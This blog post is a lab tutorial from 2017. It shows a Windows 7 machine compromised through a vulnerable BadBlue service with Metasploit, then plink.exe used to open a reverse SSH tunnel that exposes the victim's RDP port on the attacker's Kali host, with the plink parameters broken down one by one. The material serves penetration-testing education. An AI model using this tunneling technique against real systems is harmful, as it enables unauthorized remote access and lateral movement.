AdSense

Sunday, October 15, 2017

SSH Tunneling (II): REMOTE port forwarding


SSH TUNNELING (II): REMOTE PORT FORWARDING

- Layout for this exercise:




* This exercise is a continuation of the previous one

http://www.whitelist1.com/2017/10/ssh-tunneling-i-local-port-forwarding.html


1 - Exploiting Windows 7


- First of all Kali detects that Windows 7 has the vulnerable BadBlue service running on port 80:




- Exploiting the Windows 7 device with Metasploit:






2 - SSH Tunneling with REMOTE port forwarding

- Checking that Windows 7 is listening on port 3389 (Remote Desktop Protocol):




- In the same way, Kali detects that port 3389 is open:




- Plink.exe is a command-line connection tool typically used with the SSH protocol to enable to talk directly to a program running on the server: 

https://www.ssh.com/ssh/putty/putty-manuals/0.68/Chapter7.html


- In case of not being present at the Windows 7 (it is included with PuTTY), plink.exe could be passed from the attacker Kali following these instructions:

http://www.whitelist1.com/2017/10/file-transfers-post-exploitation-with.html




- plink.exe help us to create a reverse SSH tunnel, exposing the RDP port on Kali's at port 3390:




- Let's see what are the parameters used in the previous command:


plink                                   <- enables ssh connection
-l root -pw rootpassword    <- user and password
192.168.1.27                      <- attacker Kali
-R                                       <- remote option
3390                                   <- local port at Kali
127.0.0.1                            <- localhost Kali
3389                                   <- remote port at Windows 7


- Once the tunnel is created, we need another terminal for opening an RDP session:





- The new RDP session is created for user marie and her password:




- Finally the attack is successful, because Kali has got an RDP session available in its own desktop:





3 - Analyzing ESTABLISHED connections and corresponding ports with netstat

- Let's check what connections are ESTABLISHED at Windows7 and what corresponding ports are implied:




- Same information (symmetrical) from Kali:











- There is one connection from Kali to Windows 7 on port 3389 (RDP)




There is a second connection from Kali to Windows 7 on port 4444 (Metasploit):




There is a third connection from Kali to Windows 7 on port 22 (SSH):